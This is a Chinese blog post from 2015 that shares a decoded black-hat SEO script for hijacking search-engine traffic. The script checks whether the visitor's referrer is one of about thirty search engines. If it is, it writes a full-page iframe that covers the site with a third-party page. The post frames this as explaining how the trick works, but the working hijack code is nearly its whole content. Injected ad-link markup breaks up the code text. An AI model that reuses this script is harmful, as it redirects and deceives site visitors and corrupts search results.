Posted in Javascript onSeptember 15, 2015
今天在浏览网页时无意中发现了这段JS劫持搜索引擎代码。劫持搜索引擎正常搜索过来的流量,这是黑帽seo常用的劫持方法。特意解密出来供大家了解其劫持原理。
源码打印帮助
<SCRIPT language="<span id="0_nwp" style="width: auto; height: auto; float: none;"><a id="0_nwl" href="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=javascript&k0=javascript&kdi0=0&luki=8&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="0" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">javascript</span></a></span>">
var _$ = ["google", "aol", "yahoo", "bing", "msn", "hotbot", "go", "searchengine", "altavista", "goto", "excite", "slider", "musicsearch", "lycos", "look<span id="1_nwp" style="width: auto; height: auto; float: none;"><a id="1_nwl" href="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=smart&k0=smart&kdi0=0&luki=3&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="1" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">smart</span></a></span>", "netscape", "search", "ask", "Mahalo", "dogpile", "S-R", "webcrawler", "yandex", "splut", "fireball", "wlw", "suche", "godado", "tiscali", "iltrovatore", "abacho", "<div <span id="2_nwp" style="width: auto; height: auto; float: none;"><a id="2_nwl" href="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=style&k0=style&kdi0=0&luki=6&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="2" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">style</span></a></span>=\"z-index:10043;background-color:#ffffff;right:0px;position:absolute;tex-align:center;width:100%;height:100%;top:0px;left:0px;\"><iframe id=\"rf\" scrolling=\"no\" frameborder=\"0\" style=\"width:100%;height:2043px;display:<span id="3_nwp" style="width: auto; height: auto; float: none;"><a id="3_nwl" href="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=block&k0=block&kdi0=0&luki=5&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="3" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">block</span></a></span>;visibility:visible;\" <span id="4_nwp" style="width: auto; height: auto; float: none;"><a id="4_nwl" href="http://cpro.baidu.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=src&k0=src&kdi0=0&luki=4&n=10&p=baidu&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3A%2F%2Fwww%2E5ixuexiwang%2Ecom%2Fhtml%2Fbiancheng%2Fjs%2F2014%2F0704%2F2065%2Ehtml&urlid=0" target="_blank" mpid="4" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">src</span></a></span>=\"http://www.5ixuexiwang.com/\" allowtransparency=\"true\"></div>"];
var a = window["document"]["referrer"];
if (a["indexOf"](_$[0]) > 0x0 || a["indexOf"](_$[1]) > 0x0 || a["indexOf"](_$[2]) > 0x0 || a["indexOf"](_$[3]) > 0x0 || a["indexOf"](_$[4]) > 0x0 || a["indexOf"](_$[5]) > 0x0 || a["indexOf"](_$[6]) > 0x0 || a["indexOf"](_$[7]) > 0x0 || a["indexOf"](_$[8]) > 0x0 || a["indexOf"](_$[9]) > 0x0 || a["indexOf"](_$[10]) > 0x0 || a["indexOf"](_$[11]) > 0x0 || a["indexOf"](_$[12]) > 0x0 || a["indexOf"](_$[13]) > 0x0 || a["indexOf"](_$[14]) > 0x0 || a["indexOf"](_$[15]) > 0x0 || a["indexOf"](_$[16]) > 0x0 || a["indexOf"](_$[17]) > 0x0 || a["indexOf"](_$[18]) > 0x0 || a["indexOf"](_$[19]) > 0x0 || a["indexOf"](_$[20]) > 0x0 || a["indexOf"](_$[21]) > 0x0 || a["indexOf"](_$[22]) > 0x0 || a["indexOf"](_$[23]) > 0x0 || a["indexOf"](_$[24]) > 0x0 || a["indexOf"](_$[25]) > 0x0 || a["indexOf"](_$[26]) > 0x0 || a["indexOf"](_$[27]) > 0x0 || a["indexOf"](_$[28]) > 0x0 || a["indexOf"](_$[29]) > 0x0 || a["indexOf"](_$[30]) > 0x0) {
window["document"]["writeln"](_$[31])
}
</SCRIPT>
以上内容就是给大家分享的黑帽seo劫持程序,js劫持搜索引擎代码,希望大家喜欢。
黑帽seo劫持程序,js劫持搜索引擎代码
- Author -
mrr声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。
Reply on: @reply_date@
@reply_contents@